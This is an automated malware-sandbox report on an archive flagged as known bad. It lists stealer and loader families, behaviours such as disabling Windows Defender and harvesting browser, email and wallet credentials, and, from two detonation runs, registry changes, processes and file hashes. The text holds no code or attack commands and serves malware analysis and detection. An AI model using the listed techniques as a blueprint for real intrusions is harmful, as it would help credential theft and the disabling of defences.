Analysis Overview
SHA256
1824be1799f0c32c14c5fcb3c5d34c98b9fb4d2b867067b8ddc3d129783812fe
Threat Level: Known bad
The file quarantine.7z was found to be: Known bad.
Malicious Activity Summary
Vidar family
Systembc family
Modifies Windows Defender TamperProtection settings
Stealc
Modifies Windows Defender notification settings
Gcleaner family
Stealc family
SystemBC
Healer
Modifies Windows Defender DisableAntiSpyware settings
Amadey
Healer family
RedLine
Vidar
Lumma Stealer, LummaC
Amadey family
Lumma family
RedLine payload
Redline family
Detect Vidar Stealer
Detects Healer an antivirus disabler dropper
Modifies Windows Defender Real-time Protection settings
GCleaner
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Blocklisted process makes network request
Sets service image path in registry
Command and Scripting Interpreter: PowerShell
Uses browser remote debugging
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
Identifies Wine through registry keys
Checks BIOS information in registry
Executes dropped EXE
Loads dropped DLL
Event Triggered Execution: Component Object Model Hijacking
Reads user/profile data of local email clients
Windows security modification
Checks computer location settings
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Reads data files stored by FTP clients
Enumerates connected drives
Checks installed software on the system
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
Drops file in System32 directory
Suspicious use of SetThreadContext
Boot or Logon Autostart Execution: Authentication Package
Suspicious use of NtSetInformationThreadHideFromDebugger
AutoIT Executable
Drops file in Windows directory
Drops file in Program Files directory
Program crash
System Location Discovery: System Language Discovery
Browser Information Discovery
Unsigned PE
Enumerates physical storage devices
Delays execution with timeout.exe
Uses Task Scheduler COM API
Suspicious behavior: EnumeratesProcesses
Checks processor information in registry
Suspicious use of SetWindowsHookEx
Scheduled Task/Job: Scheduled Task
Suspicious use of AdjustPrivilegeToken
Modifies data under HKEY_USERS
Suspicious use of FindShellTrayWindow
Modifies system certificate store
Uses Volume Shadow Copy service COM API
Suspicious use of WriteProcessMemory
Suspicious use of SendNotifyMessage
Modifies Internet Explorer settings
Modifies registry class
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Enumerates system info in registry
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2025-02-26 23:27
Signatures
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral27
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win7-20241010-en
Max time kernel
67s
Max time network
134s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ae8b7ea42b54c54c85332ffd14cc41d30000000002000000000010660000000100002000000045887b44c83ad88d5136abd7e21083d503c13f484c39d93e8e1f5bf8644135fd000000000e80000000020000200000003f952c246091f772b36420468333483fe3cb24c14ccbc73adb586528902228ec200000006828d39e1c038318bfc4a92f7a523a6741129d1379c3810b1eeaf0d7ddce995a400000007371238750ecf8f613744640e853cc4b45ba14263b2d95e6b38e8f210c4d7d8a1bda886347804197c49bed3aebe4239a0e6080eda67cba9ea7657ec20737324a | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{4B3EEF21-F499-11EF-82FE-DEA5300B7D45} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ae8b7ea42b54c54c85332ffd14cc41d300000000020000000000106600000001000020000000ff5933631e1a5c01a0ac9f3d7d630a3e333938b1e8c0c4cf84b29b6b64bca2c6000000000e80000000020000200000004d0dc1c45f5b78428d62d59f16d08f95d65a866887507975ec70da308985350990000000554643316711b07dac210e662c9f8fba9af28a1f3a3a4aff5795a44af41ee221228f2703f7d6a8d0bb8a2e9d31ba5701109c4af43cf9ff347f009a3f0ab813b0cbbe64bbb42ef1aba1241da94b0faa2a5b2375debb24cde2f048642c1d6a99b526ecec46ec843188542ebaac2e3170619eae4eea3947a3a50b8519ded7a7b0f30cbf00695787d89b5116e67dd1bbf099400000000311fc9b95f0aa4746f8e63c9b7115fd770135046261f4ee571b2f48b1a0aa208d1dd133e9050df96255ef52869b4fdda6f34151cdfff08aaae17b166bf82ed9 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "446774338" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 50a83020a688db01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1552 wrote to memory of 2156 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 1552 wrote to memory of 2156 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 1552 wrote to memory of 2156 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
| PID 1552 wrote to memory of 2156 | N/A | C:\Program Files\Internet Explorer\iexplore.exe | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE |
Processes
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\quarantine\ssystemfiktums.html
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1552 CREDAT:275457 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
Files
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 83142242e97b8953c386f988aa694e4a |
| SHA1 | 833ed12fc15b356136dcdd27c61a50f59c5c7d50 |
| SHA256 | d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755 |
| SHA512 | bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10 |
C:\Users\Admin\AppData\Local\Temp\TarD735.tmp
| MD5 | 109cab5505f5e065b63d01361467a83b |
| SHA1 | 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc |
| SHA256 | ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673 |
| SHA512 | 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 70001cba55992328514c4563c49ca744 |
| SHA1 | b7f5e636c9c1e6808241193c9b53ed115aa4e057 |
| SHA256 | b624cb0cfd506bc70ccbfec6526b95cde9ca12354923459d82067fab61c0d107 |
| SHA512 | 2e80349e47744c9731d57ec730f7faf7707b5705798b9fb3e307d0da1602f6846668888c89ec85b09da62d76e80248613b0d5f51224c2a366ea161eb6c661b89 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | decf1ce29380ee49a1118295388600ca |
| SHA1 | 4fd34a6341641c951b93733424ac885765ed8906 |
| SHA256 | aad77e6d0e4b628d62cd5a8dd620a41dd1a43484a4efc037ef50db66c9fa2822 |
| SHA512 | 6e03dd6d2172dee46741808224c4f2b3075e818c69e312b646f2be3a17de0e28cce505210df1f2975401905e27efdc8de77acd746a52a25971345e5ad3d6aea9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | cdcf2971a33ccf8faa1db43b83506e93 |
| SHA1 | de2dfdc58f744f3261f93001732d69b906323d9d |
| SHA256 | ba4dd92b06dc5832a451e6ecda9147b9f98c1d20728bc20205525276c5551487 |
| SHA512 | eb13cafc4a5aa28bdb6253c6df1d221f6d0b94762f1a1a594f6f9b3e6adfe3210f7d7d48509c789d3bdcc8ae8826344eda6395fb61bb354faafcf0d73c263e4f |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 31f935ad1f2f4a5fe2c0f4cd8c1cd0dc |
| SHA1 | 3f936541074bef8c1c7327a3037131d909f99677 |
| SHA256 | bee6be86f7efa7ec400767646027e0fe3756e7f3123730d60199625f6a8119ff |
| SHA512 | 117fddf766ae566afe2dad0ffbdca93a8b02f5f18d215d2d53ee7d34eb4ea50fc13cf86208b7a6298bbfbc6014fe228214ea0543db31e40be9af5e99ffa6df3d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | d682024bc77de9a62c1894f9e5071167 |
| SHA1 | 590a398d66d314b268881f920319570ab2a02efd |
| SHA256 | a2a886acd5c1fc286cfb7228a183729d0b57a681073c89f15b9a76d7b0bf268f |
| SHA512 | 155ec4bfe5ccb8336980830be1e5ede17e14037498cf340b77ddf40be45ee5416369ebb8fa0df205e829918e757bcd6a946f6bcc7e2b69806440d501c9fcc878 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | bc499739cfae054cd178e8c24a4f0b5b |
| SHA1 | d2d4d524a9239f447f350e0f65c25331664642b1 |
| SHA256 | 6c23600ed6ac271377930df7f3aaecf725b7c6361b3c07bc02f0b47f1295395e |
| SHA512 | 614295ab8357a7b7c127ef312a7591dcaa5b30cb8d175848f55be38cc0bb4c9c0cb6e01ad70b5ae81c6c70e76fe7a40db6d25c628888d867aa7a200c922597da |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2c182b01a19059402ec351ca87e133eb |
| SHA1 | 858d769d7560b928c7910d72e38739d523755966 |
| SHA256 | 2e70769e50842db18e70da4bd48df497fe4f150d95acbca8e3edfee45f4bd884 |
| SHA512 | f353b59eef0bb2f11cc51f0f0056baaa53e17bc4c9b311adcbcd79687b87999a7ee9dcfab41a98ba6f9447fa75ed6afca340571647ad44f328b32fc5395e659f |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 00ed9e2d653713d91714493576664f9e |
| SHA1 | c0573bbd776316ea5f28fb165af1205ec2eb1345 |
| SHA256 | abb04c6ee830c2203a8aa7a2a1fa05ed34af2fd3537ef4900972ed9b28401bfa |
| SHA512 | 674d74703f8aae84f0934c3ec11cdb46d110e56423c7f818f816db8240c5a5d57e858fb00b1ae2365bc01e57fdcd7c07964b732193e1df538ef10f3c9dbf112c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | abcdfa1cead4ff1da429ab9365824852 |
| SHA1 | 6ac9931616e486d2a01872d531ac6540eadd38fc |
| SHA256 | 9484f45c5689b53c688755a46403a864947f88ab0ff42a15fe00ec2e0e979ba5 |
| SHA512 | 599cd3cf5e0d181e79b398075a11a300ee088d1ef57b7ac4f5274345a8f619c920853466134cd2802fdad6c9d00b511bc8eec4b9c4eebc06afe488be504b76d2 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | fb21db51e1cbed039be5047f9bb59a12 |
| SHA1 | f1fb0f1373a368e304b426c1a31361de034b128a |
| SHA256 | c71d9f5060d772f232dd8454cbdcbe3678770a22e03b58fe26e3e01a0e3a0b7d |
| SHA512 | d39c80964355eec95490ae36771eefc1c5b2876477e0be805f41790e241c7f78884bfba066d3dd4ce822d864f909ee6219903b31057c30d73e90f6efdc8f2a76 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 44440d103dcba9092eb5aee60736108b |
| SHA1 | 4ef1dd0d22eef39822f5d91de8b32d8cca0a8b1f |
| SHA256 | 16b43a2d4a8aa0e21fa4976ada0482cfc6729a974c07774d0b507eaa38db9581 |
| SHA512 | 4612d2c8a04d47001cf2844c3cad9384c20d2ce83c0d44b7eaadbcdc6b0a91819d39db445bd16d1ab27381d98bb9ca02a6ae9dbee644ec3d66fa7ca463e85761 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 7d2e2bae63e72e23cf6b1baae47c22d3 |
| SHA1 | 3468c3699abbb068b8489d99992ce06c77ec1fef |
| SHA256 | d9d9ab0477424b72460cdbc923c09ee731b4726732da38bb1ac1deaf61e8a4b4 |
| SHA512 | ff511590bad2d26a073ca7e36de461a2adb4f837d1f10f3af443ad8208968b3aaff243a26a08931c867145e1ceb067298ca280bcefb4a12f75eb7f9e170c32da |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | bd0b101e04996e1d74c507195868528b |
| SHA1 | 0c7189c3ffaeac23a406d65b004cce828cdd77ba |
| SHA256 | d63d7c9a3ed5a842d8af787d65a8cc848a708c604326ae0cb88454464395517c |
| SHA512 | dcb2dfe6088907182c943efcebbd54d42469a55898005e87092da037a335e2412d7a95fe5cf5cdf35db2825d12150d0b3af0f816f6137a5d72f122fa353b287b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 35ac7e57438a01a2b44ac3e5be05c1ba |
| SHA1 | a6c79fb04413a2c4f67fdc6dba4a141ed38b4835 |
| SHA256 | bfc43e27beaa990e771e6f6666c65b600df47d1d3b8562e0ee4e216a3b33c296 |
| SHA512 | f11075dabc2d34ff17e3973a78ce1142414136c07125cf8d822bb2ad46452bda01c7e1431275a68926c1571ef3c010c560dd0bc8c69cdc49a6cbc38e057cf301 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | fba793a8201e9815ddeec435dafe7519 |
| SHA1 | 94443023b753e8ce4e97888a8f0620fe825a7f3b |
| SHA256 | fb62ace77958c6076bf9541ea0846e55f77c5bba589c17f41e7a92285e302250 |
| SHA512 | ee83f3195f2a4f0742d3679f0d8379c6c20c727054646d00f40b75b78d53ecde3d26facf4ab60c9fede8002885034dafb2f7d09ea1f6984f6936482d570287df |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | b9b2a5b12c5b8a4a00485702952138ef |
| SHA1 | 3b6fb8b666d675b527378d58683d5ed38571d262 |
| SHA256 | 9f43a23a19151d13487f7e808b21cfdb98e7a4bfcaaf42a9a346b8b4904e2e67 |
| SHA512 | 69ab36f8c5ea7a6662c4c7379add3e4403ce0c6411c5b5d2643b362c65362dfe2d5071822fd9d8b57f60322fdb6adab90a06f80c1ae57182e750182b81e2407f |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | d1671e352f16043716fcbd1792f533f5 |
| SHA1 | c014dd37a1082cb350363110b30d20842b4064d0 |
| SHA256 | 4ad6caf87f40df017cb1e8c9f2732e79c75ea5e5425f793d8d946549e19120c1 |
| SHA512 | c6b26ab39b74a2945de55845a8e20d93e11e3f4a514193729983c218e50a59d65c15762db1af2d5d756d4b6ba0bdb9c89ee78cf69eed17588da1249b3b9cf05a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | de2e1b07cd2360248afbcc5ae5f26a5a |
| SHA1 | c92d0f98c21ff9e11da080b707f52fb11d638d76 |
| SHA256 | 1444e1dfe5b03a9f3d2fff8ffeddbfd0af4d357e125ebe65bec64622b7e128cf |
| SHA512 | c4b2ec0d985c78761ecf4be024f29ba9cab78e94c3040866936c86b74a3942f4167de2fc78107b0d0dc63e8cc8d872ab02f5019883ec03e5db0559a39de4a30b |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 7d5fd7d1a3fd09424692ac101c7b5324 |
| SHA1 | ec248ae02c2ad8d68bd9767b41eadc51b8480efc |
| SHA256 | 7296e0b85efe3d6cdbef4d8617fc646773f602cbf693cfe19f983a11c2990e69 |
| SHA512 | a57ce92174545adaea2980feb10e6e640b2be98050d58e207e2ab06b6587d9da2014552302d646bbb059d622dacefed43de7af99090e249319e1d0415f6e4086 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | a2095d9a29fc83cf0e876cae66a39dc5 |
| SHA1 | 34208dba4502476b715d26404feec22676dedc4b |
| SHA256 | 86e1f9e742f40a4998089136b082595a716d26442ded6b9025f9a5acd731d515 |
| SHA512 | 5c9b4dd60eabe0e98982514b2341dfb43a4207e4322cdb05bc8cddf582fbceb1e4235991c37fe3776a8fa6a3eaed817ea7a8451c2c71d98f81f5ebf65c1c7844 |
Analysis: behavioral5
Detonation Overview
Submitted
2025-02-26 23:27
Reported
2025-02-26 23:30
Platform
win7-20240903-en
Max time kernel
150s
Max time network
119s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
"C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe"
C:\Users\Admin\AppData\Local\Temp\quarantine\Dyshh8M.exe
